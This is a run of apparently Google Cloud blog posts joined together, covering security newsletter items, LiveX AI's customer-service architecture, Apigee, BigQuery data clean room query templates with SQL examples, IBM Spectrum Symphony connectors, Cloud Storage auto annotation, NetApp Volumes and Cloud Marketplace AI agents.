Announcing quantum-safe Key Encapsulation Mechanisms in Cloud KMS: We’re supporting post-quantum Key Encapsulation Mechanisms in Cloud KMS, in preview, enabling customers to begin migrating to a post-quantum world. Read more.
Master network security with Google Cloud’s latest learning path: Google Cloud is launching a new Network Security Learning Path that culminates in the Designing Network Security in Google Cloud advanced skill badge. Read more.
Mandiant Academy: Basic Static and Dynamic Analysis course now available: To help you get started in pursuing malware analysis as a primary specialty, we’re introducing Mandiant Academy’s new Basic Static and Dynamic Analysis course. Read more.
The future of media sanitization at Google: Starting in November, Google Cloud will begin transitioning our approach to media sanitization to fully rely on a robust and layered encryption strategy. Read more.
Please visit the Google Cloud blog for more security stories published this month.
Threat Intelligence news
Oracle E-Business Suite zero day exploited in widespread extortion campaign: A new, large-scale extortion campaign by a threat actor claiming affiliation with the CL0P extortion brand has been targeting Oracle E-Business Suite (EBS) environments. Along with our analysis of the campaign, we provide actionable guidance for defenders. Read more.
Frontline observations: UNC6040 hardening recommendations: Protecting software-as-a-service (SaaS) platforms and applications requires a comprehensive security strategy. In this guide drawn from analysis of UNC6040’s specific attack methodologies, we present a structured defensive framework and emphasize Salesforce-specific security recommendations. Read more.
Please visit the Google Cloud blog for more threat intelligence stories published this month.
Now hear this: Podcasts from Google Cloud
How CISOs have evolved from security cop to cloud and AI champion: David Gee, board risk advisor and former CISO, shares his guidance for security leaders with hosts Anton Chuvakin and Tim Peacock, and discusses how the necessary skills, knowledge, experience, and behaviors for a CISO have evolved. Listen here.
From scanners to AI: 25 years of vulnerability management with Qualys' CEO: Sumedh Thakar, president and CEO, Qualys, talks with hosts Anton and Tim about how vulnerability management has changed since 1999, whether we can actually remediate vulnerabilities automatically at scale, and of course, AI. Listen here.
Securing real AI adoption, from consumer chatbots to enterprise guardrails: Rick Caccia, CEO and co-founder, Witness AI, discusses with Anton and Tim how AI is similar to — and different from — previous massive technology shifts. Listen here.
Behind the Binary: The machine learning revolution in reverse engineering: Host Josh Stroschein is joined by Hahna Kane Latonick for a deep dive into the powerful world where reverse engineering meets data science. Listen here.
To have our Cloud CISO Perspectives post delivered twice a month to your inbox, sign up for our newsletter. We’ll be back in a few weeks with more security-related updates from Google Cloud.
Customer service teams at fast-growing companies face a challenging reality: customer inquiries are growing exponentially, but scaling human teams at the same pace isn’t always sustainable.
Intelligent AI tools offer a new path forward. They handle routine questions automatically so employees can focus on more complex customer service tasks that require empathy, judgment, and creative problem-solving.
LiveX AI enables businesses to build and deploy advanced AI systems that deliver natural conversational experiences at scale. These can show up as chatbots, call center agents — even 3D holographic personas in live settings.
Handling thousands of concurrent, real-time interactions with low latency requires infrastructure that is both powerful and elastic, especially when complex issues need to be seamlessly escalated to human agents.
In this joint technical post, we’ll share the technical blueprint LiveX AI uses to build and scale its intelligent customer experience systems on Google Cloud, demonstrating how the right combination of services makes this transformation possible.
Why this architecture matters: Proven ROI
This architecture delivers measurable business impact.
90%+ self-service rate for Wyze: Smart home leader Wyze deployed LiveX AI to achieve a 90%+ self-service rate, enabling their support team to focus on complex cases that require human expertise while improving the overall customer experience.
3x conversion for Pictory: The video creation platform Pictory saw a 3x increase in conversions by using LiveX AI to proactively engage and qualify website visitors.
These results are only possible through a sophisticated, scalable, and secure architecture built on Google Cloud.
Platform capabilities designed for scale
The LiveX AI platform is designed to be production-ready, enabling companies to easily deploy intelligent customer experience systems. This is possible through key capabilities, all running on and scaling with Google Cloud’s Cloud Run and Google Kubernetes Engine (GKE):
AgentFlow orchestration: The coordination layer that manages conversation flow, knowledge retrieval, and task execution. It routes routine queries automatically and escalates complex issues to human agents with full context.
Multilingual by design: Built to deliver native-quality responses in over 100 languages, leveraging powerful AI models and Google’s global-scale infrastructure.
Seamless integration: Connects securely to internal and external APIs, enabling the system to access account information, process returns, or manage subscriptions, giving human agents complete context when they step in.
Customizable knowledge grounding: Trained on specific business knowledge to ensure accurate and consistent responses aligned with team expertise.
Natural interface: Deployed via chat, voice, or avatar interfaces across web, mobile, and phone channels.
Figure 1: LiveX real-world 3D assistants
The technical blueprint: Building intelligent customer experience systems on Google Cloud
LiveX AI’s architecture is intelligently layered to optimize for performance, scalability, and cost-efficiency. Here’s how specific Google Cloud services power each layer.
Figure 2: LiveX AI customer service agent architecture on Google Cloud
The front-end layer
Managing real-time communication across web, mobile, and voice channels requires lightweight microservices that handle session management, channel integration, and API gateway services.
Cloud Run is the ideal platform for this workload. As a fully managed, serverless solution, it automatically scales from zero to thousands of instances during traffic spikes, then scales back down, so LiveX AI only pays for the computation it actually uses.
The orchestration and AI engine
The platform’s core, AgentFlow, manages the conversational state, interprets customer intent, and coordinates responses. When issues require human expertise, it routes them to agents with complete context. The system processes natural language input to determine customer intent, breaks down requests into multi-step plans, and connects to databases (like Cloud SQL) and external platforms (Stripe, Zendesk, Intercom, Salesforce, Shopify) so both AI and human agents have complete customer context.
Cloud Run for orchestration automatically scales based on request traffic, perfectly handling fluctuating conversational loads with pay-per-use billing.
GKE for AI inference provides the specialized capabilities needed for real-time AI:
GPU management: GKE’s cluster autoscaler dynamically provisions GPU node pools only when needed, preventing costly idle time. Spot VMs significantly reduce training costs.
Hardware acceleration: Seamless integration with NVIDIA GPUs and Google TPUs, with Multi-Instance GPU (MIG) support to maximize utilization of expensive accelerators.
Low latency: Fine-grained control over specialized hardware and the Inference Gateway enable intelligent load balancing for real-time responses.
With this foundation, LiveX AI can serve millions of concurrent users during peak demand while maintaining sub-second response times.
The knowledge and integration layer
From public FAQs to secure account details, the knowledge layer provides all the information the system needs to deliver helpful responses.
The Doc Processor (on Cloud Run) builds and maintains the knowledge base in the vector database for the Retrieval-Augmented Generation (RAG) system, while the API Gateway manages configuration and authentication. For long-term storage, LiveX AI relies on Cloud SQL as the management database, while short-term context is kept in Google Cloud Memorystore.
Putting it all together
Three key advantages emerge from this design: elastic scaling that matches actual demand, cost efficiency through serverless and managed GKE services, and the performance needed for real-time conversational AI at scale.
Looking ahead: Empowering customer experience teams at scale
The future of customer service centers on intelligent systems that amplify what human agents do best: empathy, judgment, and creative problem-solving. Businesses that adopt this approach empower their teams to deliver the personalized attention that builds lasting customer relationships, freed from the burden of repetitive queries.
For teams evaluating AI-powered customer experience systems, this architecture offers a proven blueprint: start with Cloud Run for elastic front-end scaling, leverage GKE for AI inference workloads, and ensure seamless integration with existing platforms.
The LiveX AI and Google Cloud partnership demonstrates how the right platform and infrastructure can transform customer service operations. By combining intelligent automation with elastic, cost-effective infrastructure, businesses can handle exponential inquiry growth while enabling their teams to focus on building lasting customer relationships.
To explore how LiveX AI can help your team scale efficiently, visit the LiveX AI Platform.
To build your own generative AI applications with the infrastructure powering this solution, get started with GKE and Cloud Run.
We are excited to share that Google has been recognized as a Leader in the 2025 Gartner® Magic Quadrant™ for API Management, positioned highest for our Ability to Execute — marking our tenth consecutive recognition.
Google was positioned highest in Ability to Execute of all vendors evaluated. We believe this reflects our commitment not only to supporting traditional API use cases, but also to providing a bridge for our customers to AI and agentic AI management, using the same familiar platform and native controls.
Extending API management to gen AI and agentic AI
The rise of AI and agentic workloads is powered by an API nervous system. While AI tools create powerful possibilities, organizations often hit roadblocks moving from pilot to production. At issue are managing, securing, and scaling these solutions — especially with LLMs and the agents that leverage them in highly regulated environments.
Apigee, Google Cloud’s native API management platform, bridges this gap. We are extending our proven capabilities directly to your AI initiatives, helping them deliver real, measurable business value.
Apigee functions as the intelligent, secure proxy for all your AI agents, tools, and backend models, enhancing their security, scalability, and governance. By serving as this crucial gateway, Apigee helps secure agentic workloads against risks, ensures operations are on governed data, and helps control costs.
Managing, governing, and securing agentic AI
A variety of Apigee capabilities help enterprise API and AI platform teams move AI initiatives into production. These capabilities include:
AI productization: API products are at the center of the Apigee platform, enabling platform teams to bundle discrete API operations into a product, manage access and quota, and make it available for consumption. Today, Apigee is helping teams move toward AI productization, bundling tools including third-party integrations (from Application Integration), agentic tools such as MCP servers, and of course APIs, into an AI product. This promotes developer reuse, granular access control, and monetization, so organizations can unlock new revenue streams.
Agent-ready tools: Apigee's new API specification boosting capability (currently in Private Preview), based on a multi-agent tool built by Google DeepMind, automatically enhances existing API specifications to make them more discoverable by agents. It does so by including comprehensive examples, error scenarios, and business logic derived from your organization's API patterns.
AI cost management: Customers use Apigee's native quota policies to enforce token limits at the API or AI product level. Our integration with Looker Studio (a free Google Cloud service) gives API platform teams the ability to create custom reports on AI token usage that can be shared externally with stakeholders.
Centralized tool catalog and observability: Apigee API hub provides a centralized catalog in which to store information about your APIs, MCP servers, and third-party integrations. Built-in semantic search capabilities powered by Gemini help teams discover and reuse tools. Thanks to the Apigee API hub toolset for Agent Development Kit (ADK), developers building custom agents with ADK can easily give their agents access to tools from Apigee API hub with a single line of code. API traffic and performance data is integrated into the catalog for access by humans and agents. Further, these same semantic capabilities drive emerging use cases such as semantic tool identification.
Tool security and compliance: Apigee's 60+ policies include security policies that help keep tools protected and safe, including native policies for AI safety using Model Armor. Additionally, Apigee Advanced API Security integrates natively with Apigee's runtime, providing enhanced security capabilities like dynamic API security posture management and abuse detection powered by Google-engineered machine learning models. Finally, Apigee's enhanced data residency capabilities help support compliant workloads worldwide.
Multi-cloud model routing: Apigee serves as a proxy between agents and backend LLM models, connecting agents with tools and routing requests to backend LLMs hosted on and off Google Cloud. Apigee's circuit-breaking capabilities help ensure that AI and agentic applications remain highly available.
Apigee: Trusted by global leaders
Global leaders trust Apigee to manage mission-critical APIs at scale, even in highly regulated industries. We are committed to continuously investing in Apigee to ensure it remains a world-class, trusted service that meets the evolving needs of our customers. In our opinion, this recognition from Gartner reinforces our commitment to continuous innovation and the delivery of an exceptional developer experience.
Thank you to our customers and partners
We're incredibly grateful to our community of customers, developers, and partners for your continued support and trust in Apigee. Your feedback and collaboration are invaluable in driving our product roadmap and helping us deliver a reliable API management experience.
In today’s data-driven landscape, the ability to collaborate securely and efficiently is paramount. BigQuery data clean rooms provide a robust and secure environment for multiple parties to share, join, and analyze data without compromising sensitive information. Building on this foundation, today, we’re announcing BigQuery data clean room query templates in preview, bringing a new level of control, security, and ease of use to your clean room collaborations. In this post, we explore how these templates can transform your data collaboration workflows.
What are query templates?
Query templates allow data clean room owners to create fixed, reusable queries that run against specific BigQuery tables in a controlled environment. These templates accept input parameters and return only the resulting rows, allowing users to gain insights without accessing the raw data and reducing the risk of data exfiltration. Query templates offer several benefits:
Strengthened data leakage prevention: Open-ended exploration within a clean room raises concerns for data clean room owners about unintended data exposure. Restricting queries through pre-defined templates significantly reduces the potential for sensitive data breaches while still allowing users to query data in a self-serve manner.
Simplified user onboarding: To ease adoption for users with limited technical expertise, clean rooms utilize simplified query templates that providers can create on behalf of subscribers. This is crucial as many data providers have subscribers who lack proficiency in complex privacy-focused SQL.
Analytical consistency: Get consistent analytical results through controlled query execution. Without this control, enforcing data analysis rules and adhering to privacy regulations can be challenging.
Customizable query templates: Data owners and contributors can design and publish custom, approved queries suited to specific clean room applications. These templates, powered by BigQuery’s table-valued functions (TVFs), let you input entire tables or selected fields, and receive a table as the output.
Using query templates in BigQuery data clean rooms
You can use query templates to facilitate different forms of data collaboration within a clean room, for example:
Single-direction sharing: A data publisher creates a query template so that subscribing partners can only run queries defined by the publisher. Query template creators ultimately "self-approve" since no other contributor is added to the clean room.
Example scenario: Steve, a data clean room owner, creates a data clean room called Campaign Analysis and adds a my_campaign dataset with a campaigns table. Steve configures metadata controls to ensure only the metadata schema is visible and subscribers cannot access the source data. Steve then creates a query template by defining a table-valued function from campaigns, restricting all subscribers of the linked dataset to only execute the TVF by passing their own tables to gain insights on their company's campaigns.
Template syntax:
campaign_impressions(t1 TABLE<company_id STRING>) AS (
  SELECT WITH AGGREGATION_THRESHOLD OPTIONS(threshold=2, privacy_unit_column=company_id)
    company, campaign_id, SUM(impressions) AS impressions
  FROM my_project.my_campaigns.campaigns
  WHERE company_id = company_id
  GROUP BY company, campaign_id
)
Since Steve has appropriate permissions to the campaigns table (e.g. BigQuery Data Owner), he can immediately self-approve the query template after submitting it for review.
Collaborative sharing: A clean room owner invites a trusted contributor to propose queries to be run against each other's data. Both parties can safely propose queries by viewing metadata schemas only, without accessing the underlying shared data. When a query definition references data that does not belong to the template proposer, the template can only be approved by that data's owner.
Example scenario: Sally, a clean room owner, invites Yoshi, a clean room contributor, to Campaign Analysis. Yoshi can create query templates that query their data along with the owner’s data.
TVF syntax:
CREATE TABLE FUNCTION campaign_impressions(t1 TABLE<company_id STRING>) AS (
  SELECT WITH AGGREGATION_THRESHOLD OPTIONS(threshold=2, privacy_unit_column=company_id)
    company, campaign_id, SUM(impressions) AS impressions
  FROM my_project.my_campaigns.campaigns
  WHERE company_id = company_id
  GROUP BY company, campaign_id
)
In this example, since Yoshi did not add (and therefore does not own) the campaigns table, once the query template is submitted for approval, only Sally can approve it. This includes the analysis rule thresholds set by Yoshi. To use the query template, Yoshi would subscribe to the clean room and invoke the TVF, passing their own table with a field called company_id as the table parameter to execute the privacy SQL defined in the query template. Note that Yoshi does not need to add their data to the clean room.
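For illustration, a subscriber-side invocation of this template might look like the following. This is a minimal sketch: the project, linked dataset, and table names are hypothetical placeholders, but the call follows the same SELECT-from-TVF pattern shown later in this post.

-- Hypothetical example: project, dataset, and table names are placeholders.
-- Yoshi invokes the approved TVF from the linked dataset, passing a table
-- that contains a company_id column as the table parameter.
SELECT *
FROM `yoshi-project.campaign_analysis_dcr.campaign_impressions`(
  TABLE `yoshi-project.my_companies.companies`);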
Now let’s say Yoshi also adds to the clean room a my_transactions dataset with a transactions table and a products table. Yoshi also configures metadata controls to ensure only the metadata schema is visible and subscribers cannot access the source data.
Sally can now also propose query templates that join her own data to the transactions table by viewing the table's metadata schema. A couple of examples:
Template syntax:
transactions(t1 TABLE<user_id STRING>) AS (
  SELECT WITH AGGREGATION_THRESHOLD OPTIONS(threshold=5, privacy_unit_column=user_ID)
    company_id, company, campaign_id, sku, category, date, SUM(amount) AS amount
  FROM my_project.my_transactions.transactions
  WHERE user_id = user_id
  GROUP BY company_id, company, campaign_id, sku, category, date
)
Example of using a join within a query template:
transactions_join(t1 TABLE<company_id STRING>) AS (
  SELECT company, campaign_id, sku, date, SUM(amount) AS total_amount
  FROM my_project.my_transactions.transactions
  LEFT JOIN t1
    ON transactions.company_id = t1.company_id
  GROUP BY company, campaign_id, sku, date
);
Note: Multiple tables can be referenced within the TVF query syntax only if they are owned by the same party. See query template limitations for more details.
In this example, since Sally did not add (and therefore does not own) the transactions table, once the query template is submitted for approval, only Yoshi can approve it. This includes the analysis rule thresholds set by Sally. To use the query template, Sally would subscribe to the clean room and invoke the TVF, passing her own table with a field called user_ID as the table parameter to execute the privacy SQL defined in the query template. Note that Sally does not need to add her data to the clean room. Invoking the TVF looks like this:
SELECT * FROM `my-project.campaigns_dcr.transactions`(TABLE `my-project.transactions_dataset.transactions`);
Since query templates are built using table-valued functions, publishers can rest assured that query definitions (logic) are not visible to subscribers. Subscribers just see what type of parameters are accepted as input (table name or field), and can only execute TVFs defined in approved query templates. Additionally, data publishers can ensure the underlying data added to the clean room is not shared with subscribers.
What makes BigQuery query templates different?
BigQuery query templates are a powerful addition to a data analyst’s toolbox, providing a number of benefits:
Enhanced security: Query templates allow data contributors to limit and control the queries executed in a clean room, reducing the risk of accidental or intentional exposure of sensitive data and limiting exposure to unnecessarily shared data (e.g., you don't have to share the data itself to the clean room, just its schema).
Improved governance: By predefining queries, you can better enforce data analysis rules to help support compliance with privacy regulations.
Simplified onboarding: Subscribers who may not be technically proficient in SQL — especially with differential privacy and aggregation threshold SQL syntax — can easily use pre-built query templates to gain insights from the data.
Consistent analytical outcomes: With query templates, subscribers use predefined queries, which helps to deliver consistent analytical outcomes.
Streamlined workflows: Query templates save time and effort by standardizing queries for common insights, eliminating the need to explain custom queries to external collaborators.
Faster reporting: With pre-written queries, subscribers can quickly generate reports from the clean room, streamlining their workflow.
Flexible collaboration: Query templates can support single-direction sharing and multi-party collaboration with approval workflow.
Ready to get started? To learn more about query templates in BigQuery data clean rooms, check out the documentation here.
This integration between Google Cloud and IBM Spectrum Symphony gives you access to the benefits of Google Cloud for your grid workloads by supporting common architectures and requirements, namely:
Extending your on-premises cluster to Google Cloud and automatically adding compute capacity to reduce execution time of your jobs, or
Deploying an entire cluster in Google Cloud and automatically provisioning and decommissioning compute resources based on your workloads
These connectors are provided in the form of IBM Spectrum Symphony HostFactory custom cloud providers. They are open-source and can be easily deployed either via Cluster Toolkit or manually.
Partner-built and tested for enterprise scale
To deliver robust, production-ready connectors, we collaborated with key partners who have deep expertise in financial services and HPC. Accenture built the Compute Engine and GKE connectors and Aneo performed rigorous user acceptance testing to ensure they met the stringent demands of our enterprise customers.
“Accenture is proud to have collaborated with Google Cloud to help develop the IBM Spectrum Symphony connectors. Our expertise in both financial services and cloud solutions allows us to enable customers to seamlessly migrate their critical HPC workloads to Google Cloud’s high-performance infrastructure.” – Keith Jackson, Managing Director – Financial Services, Accenture
“At Aneo, we subjected the IBM Spectrum Symphony connectors to rigorous, large-scale testing to ensure they meet the demanding performance and scalability requirements of enterprise HPC. We validated the connector’s ability to efficiently manage up to 5,000 server nodes, confirming its readiness for production workloads.” – William Simon Horn, Cloud HPC Engineer, and Wilfried Kirschenmann, CTO, Aneo
Google Cloud rapidly scales to meet extreme HPC demands, provisioning over 100,000 vCPUs across 5,000 compute pods in under 8 minutes with the new IBM Spectrum Symphony connector for GKE. IBM has tested and supports Spectrum Symphony up to 5,000 compute nodes, so we set this as our target for scale testing the new GCP connector.
We achieved this performance by leveraging innovative GKE features like image preloading and custom compute classes, enabling customers in demanding sectors like FSI to accelerate mission-critical workloads while optimizing for cost and hybrid cloud flexibility.
Powerful features to run your way
The connectors are built to provide the flexibility and control you need to manage complex HPC environments. They are available as open-source software in a Google-owned repository. Key features include:
Support for Compute Engine and GKE: Separate IBM Spectrum Symphony Host Factory cloud providers for Compute Engine and GKE allow you to scale your cluster across both virtual machines and containerized environments.
Flexible consumption models: Support for Spot VMs, on-demand VMs, or a mix of both let you optimize cost and performance.
Template-based provisioning: Use configurable resource templates that align with your workload requirements.
Comprehensive instance support: Full integration with managed instance group (MIG) APIs, GPUs, Local SSD, and Confidential Computing VMs.
Event-driven management: Pub/Sub integration allows for event-driven resource management for Compute Engine instances.
Kubernetes-native: The GKE connector uses a custom Kubernetes operator with Custom Resource Definitions (CRDs) to manage the entire lifecycle of Symphony compute pods. Leverage GKE’s scaling capabilities and custom hardware like GPUs and TPUs through transparent compatibility with GKE custom computeClasses (CCC) and Node Pool Autoscaler.
High scalability: The connectors are built for high performance, with asynchronous operations to handle large-scale deployments.
Resiliency: Automatic detection and handling of Spot VM preemptions helps ensure workload reliability.
Logging and monitoring: Integrated with Google Cloud’s operations suite for observability and reporting.
Enterprise support: The connectors are supported as a first-party solution by Google Cloud, with an established escalation path to our development partner, Accenture.
Getting started
You can begin using the IBM Spectrum Symphony connectors for Google Cloud today.
Contact Google Cloud or your Google Cloud account team to learn more about how to migrate and modernize your HPC workloads.
To help ensure the success of our HPC customers, we will continue to invest in the solutions you need to accelerate your research and business goals. We look forward to seeing what you can achieve with the scale and power of Google Cloud.
Organizations interested in AI today have access to amazing computational power with Tensor Processing Units (TPUs) and Graphical Processing Units (GPUs), while foundational models like Gemini are redefining what’s possible. Yet for many enterprises a critical obstacle to AI is the data itself, specifically unstructured data. According to Enterprise Strategy Group, for most organizations, 61% of their total data is unstructured, the vast majority of which sits unanalyzed and unlabeled in archives, so-called “dark data.” But with the help of AI, this untapped resource is an opportunity to unlock a veritable treasure trove of insights.
At the same time, when it comes to unstructured data, traditional tools only scratch the surface, and subject matter experts must build massive, manual preprocessing pipelines and define the data's semantic meaning. This blocks any real analysis at scale and keeps companies from using more than a fraction of what they store.
Now imagine a world where your unstructured data isn’t just stored, but understood. A world where you can ask complex questions of data such as images, videos, and documents, and get interesting answers in return. This isn’t just a futuristic vision — the era of smart storage is upon us. Today we are announcing new auto annotate and object contexts features that use AI to generate metadata and insights on your data, so you can then use your dark data for discovery, curation, and governance at scale. Better yet, the new features relieve you from having to build and manage your own object-analysis data pipelines.
Leveraging AI to transform dark data
Now, as unstructured data lands in Google Cloud, it's no longer treated as a passive object. Instead, a data pipeline leverages AI to automatically process and understand the data, surfacing key insights and connections. Two new features are integral to this vision: auto annotate, which enriches your data by automatically generating metadata using Google's pretrained AI models, and object contexts, which lets you attach custom, actionable tags to your data. Together, these two features can help transform passive data into active assets, unlocking use cases such as rapid data discovery for AI model training, streamlined data curation to reduce model bias, enhanced data governance to protect sensitive information, and the ability to build powerful, stateful workflows directly on your storage.
Making your data smart
Auto annotate, currently in a limited experimental release, automatically generates rich metadata ("annotations") about objects stored in Cloud Storage buckets by applying Google's advanced AI models, starting with image objects. Getting started is simple: enable auto annotate for your selected buckets or an entire project, pick one or more available models, and your entire image library will be annotated. Furthermore, new images are automatically annotated as they are uploaded. An annotation's lifecycle is always tied to its object's, simplifying management and helping to ensure consistency. Importantly, auto annotate operates under your control, only accessing object content to which you have explicitly granted permissions. Then, you can query the annotations, which are available as object contexts, through Cloud Storage API calls and Storage Insights datasets. The initial release uses pretrained models for generating annotations: object detection with confidence scores, image labeling, and objectionable content detection.
A sample of generated annotations for an object
Then, with object contexts, you can attach custom key-value pair metadata directly to objects in Cloud Storage, including information generated by the new auto annotate feature. Currently in preview, object contexts are natively integrated with Cloud Storage APIs for listing and batch operations, as well as Storage Insights datasets for analysis in BigQuery. Each context includes object creation and modification timestamps, providing valuable lineage information. You can use Identity and Access Management (IAM) permissions to control who can add, change, or remove object contexts. When migrating data from Amazon S3 using Cloud Storage APIs, existing S3 Object Tags are automatically converted into contexts.
In short, object contexts provide a flexible and native way to add context to enrich your data. Combined with a smart storage feature like auto annotations, object contexts convert data into information, letting you build sophisticated data management workflows directly within Cloud Storage.
Now, let’s take a deeper look at some of the new use cases these smart storage features deliver.
1. Data discovery
One of the most significant challenges in building new AI applications is data discovery — how to find the most relevant data across an enterprise’s vast and often siloed data stores. Locating specific images or information within petabytes of unstructured data can feel impossible. Auto annotate automatically generates rich, descriptive annotations for your data in Cloud Storage. Annotations, including labels and detected objects, are available within object contexts and fully indexed in BigQuery. After generating embeddings for them, you can then use BigQuery to run a semantic search for these annotations, effectively solving the “needle in a haystack” problem. For example, a large retailer with millions of product images can use auto annotate and BigQuery to quickly find ‘red dresses’ or ‘leather sofas’, accelerating catalog management and marketing efforts.
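To make this concrete, here is a minimal sketch of a keyword-style filter over the annotation labels, a simpler first step than the embedding-based semantic search described above. The dataset, table, and column names below (a linked Storage Insights table with a repeated key-value contexts field) are illustrative assumptions, not the product's actual schema; check the documentation for the real layout.

-- Illustrative only: the table and column names are assumptions, not the
-- published Storage Insights schema.
SELECT
  bucket,
  name AS object_name,
  ctx.value AS label
FROM
  `my-project.storage_insights.object_attributes`,
  UNNEST(contexts) AS ctx  -- annotations surfaced as key-value object contexts
WHERE
  ctx.key = 'image_label'
  AND LOWER(ctx.value) LIKE '%red dress%';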
2. Data curation for AI
Building effective AI models requires carefully curated datasets. Sifting through data to ensure it is widely representative (e.g., “does this dataset have cars in multiple colors?”) to reduce model bias, or to select specific training examples (e.g., “Find images with red cars”), is both time-consuming and error-prone. Auto annotate can identify attributes like colors and object types, to automate selecting balanced datasets.
For instance, an autonomous vehicle company training models to recognize traffic signs could use auto annotate across petabytes of on-road camera data to identify and extract images that contain the word 'Stop' or 'Pedestrian Crossing'.
Vivint, a smart home and security company, has been using auto annotate to find and understand their data.
“Our customers trust us to help make their homes and lives safer, smarter, and more convenient, and AI is at the heart of our product and customer experience innovations. Cloud Storage auto annotate’s rich metadata delivered in BigQuery helps us scale our data discovery and curation efforts, speeding up our AI development process from 6 months to as little as 1 month by finding the needle-in-a-haystack data essential to improve our models.” – Brandon Bunker, VP of Product, AI, Vivint
3. Governing unstructured data at scale
Unstructured data is constantly growing, and manually managing and governing that data to identify sensitive information, detect policy violations, or categorize it for lifecycle management is a challenge. Auto annotate and object contexts help solve these data governance and compliance challenges. For example, a retail customer can use auto annotate to identify and flag images containing visible customer personally identifiable information (PII), such as shipping labels or order forms. This information, stored in object contexts, can then trigger automated governance actions such as moving flagged objects to a restricted bucket or initiating a review process.
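As a sketch of how such a review could be prioritized, the query below counts flagged objects per bucket from a Storage Insights dataset in BigQuery. As with the earlier example, the table, column, and context key names are hypothetical placeholders rather than the product's actual schema.

-- Illustrative only: schema and context key names are assumptions.
SELECT
  bucket,
  COUNT(*) AS flagged_objects
FROM
  `my-project.storage_insights.object_attributes`,
  UNNEST(contexts) AS ctx
WHERE
  ctx.key = 'pii_flag'
  AND ctx.value = 'true'
GROUP BY bucket
ORDER BY flagged_objects DESC;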
BigID, a partner building solutions on Cloud Storage, reports that using object contexts is helping them manage their customers’ risk:
“Object contexts gives us a way to take the outputs of BigID’s industry-leading data classification solutions and apply labels to Cloud Storage objects. Object contexts will allow BigID labels to shed light onto data in Cloud Storage: identifying objects which contain sensitive information and helping them understand and manage their risk across AI, security, and privacy.” – Marc Hebrard, Principal Technical Architect, BigID
The future is bright for your data
At Google Cloud, we’re committed to building a future where your data is not just a passive asset but an active catalyst for innovation. Don’t keep your valuable data in the dark. Bring your data to Cloud Storage and enable auto annotation and object contexts to unlock its full potential with Gemini, Vertex AI, and BigQuery.
You can start using object contexts today, and reach out to us for an early look at auto annotate. Once you have access, simply enable auto annotate for selected buckets or on an entire project, pick one or more available models, and your entire image library will be annotated. You can then query the annotations that are available as object contexts through Cloud Storage API calls and Storage Insights datasets.
Migrating enterprise applications to the cloud requires a storage foundation that can handle everything from high-performance block workloads to globally distributed file access. To solve these challenges, we’re thrilled to announce two new capabilities for Google Cloud NetApp Volumes: unified iSCSI block and file storage to enable your storage area network (SAN) migrations, and NetApp FlexCache to accelerate your hybrid cloud workloads. These features, along with a new integration for agents built with Gemini Enterprise, can help you modernize even your most demanding applications.
Run your most demanding SAN workloads on Google Cloud
For decades, enterprises have relied on NetApp for both network attached storage (NAS) and SAN workloads on-premises. We’re now bringing that same trusted technology to a fully managed cloud service, allowing you to migrate latency-sensitive applications to Google Cloud without changing their underlying architecture.
Our unified service is engineered for enterprise-grade performance, with features including:
Low latency engineered for your most demanding applications
Throughput that can burst up to 5 GiB/s with up to 160K random IOPS per volume
Independent scaling of capacity, throughput, and IOPS to control costs
Integrated data protection with NetApp Snapshots for rapid recovery and ransomware defense
iSCSI block protocol support is available now via private preview for interested customers.
Accelerate your hybrid cloud with NetApp FlexCache
For organizations with distributed teams and a hybrid cloud strategy, providing fast access to shared datasets is critical. NetApp FlexCache, a new capability for Google Cloud NetApp Volumes, provides high-performance, local read caches of remote volumes. This helps distributed teams access shared datasets as if they were local, and supports compute bursting for workloads that need low-latency data access, improving productivity and collaboration across your entire organization. FlexCache is available now in preview via an allowlist.
Bring your enterprise data to Gemini Enterprise
We’re also announcing that Google Cloud NetApp Volumes now serves as a data store for Gemini Enterprise. This integration unlocks new possibilities for retrieval-augmented generation (RAG), allowing you to ground your AI models on your own secure, factual, enterprise-grade data. Your data remains securely governed in NetApp Volumes and is quickly available for search and inference workflows, without the need for complex ETL or manual integrations.
Additional enhancements for your cloud environment
Google Cloud NetApp Volumes has several other new capabilities to help you modernize your data estate:
NetApp SnapMirror: You can now quickly replicate mission-critical data between on-prem NetApp systems and Google Cloud, providing a zero recovery point objective (RPO) and near-zero recovery time objective (RTO).
High performance for large volumes: For applications with massive datasets such as HPC, AI, and EDA, we now offer large-capacity volumes that scale from 15TiB to 3PiB, with over 21GiB/s of throughput per volume.
Auto-tiering: To help you manage costs, built-in auto-tiering dynamically moves infrequently accessed data to lower-cost storage, with cold data priced at just $0.03/GiB for the Flex service level. As a turnkey, integrated feature, auto-tiering is transparent to any application built on Google Cloud NetApp Volumes, and can support a tiering threshold of anywhere from 2-183 days, with dynamically adjustable policy support.
Get started
Whether you’re migrating your enterprise SAN data, powering AI with Gemini Enterprise, or running high-throughput EDA workloads, Google Cloud NetApp Volumes can help you modernize your data estate. To learn more and get started, explore the product documentation.
Your team wants to deploy AI agents, and you're probably wondering: Will they work together? Can we control the costs? How do we maintain security standards? These are important questions that every enterprise faces when adopting new AI technology. Google Cloud Marketplace gives you a proven path forward, whether you need to build custom AI agents, buy pre-built solutions for faster deployment, or find something tailored in between.
Google Cloud Marketplace connects you with thousands of pre-vetted AI agents from established agent builders and partners, validated to integrate with Gemini Enterprise. The marketplace gives leaders more control, better governance, predictable OpEx pricing models, and faster time-to-value through simplified procurement and deployment.
For agent builders, Google Cloud Marketplace offers global reach, channel sales capabilities, and co-selling opportunities with Google Cloud. This model helps agent builders monetize their AI innovations through Google Cloud’s global distribution. A recently commissioned Futurum Research study shows that technology vendors selling through Google Cloud Marketplace see 112% larger deal sizes, longer sales agreements, faster deal cycles, and improved customer retention.
For customers: Deploy enterprise-ready AI agents quickly and easily
Google Cloud Marketplace gives enterprises access to specialized, ready-to-use AI agents and agent tools. Teams can use Gemini-powered natural language search to discover partner-built agents that have been validated by Google Cloud for A2A and Gemini Enterprise integration.
Find and purchase efficiently: Customers can source high-quality and validated AI agents for their use cases from a growing ecosystem of agent builders, evaluate their capabilities, and purchase them through Google Cloud Marketplace using their existing Google Cloud account for simplified procurement and consolidated billing. Employees can browse the AI agent finder to discover agents which match their specific use cases. For agents that have been validated for Gemini Enterprise, employees can follow their organization’s standard process to request that their IT administrator procure the agents via Google Cloud Marketplace and add them to their Agent Gallery.
Quick and secure setup: After purchasing, administrators can immediately register new agents in their Gemini Enterprise environment. Integration is secure and managed through standard cloud protocols.
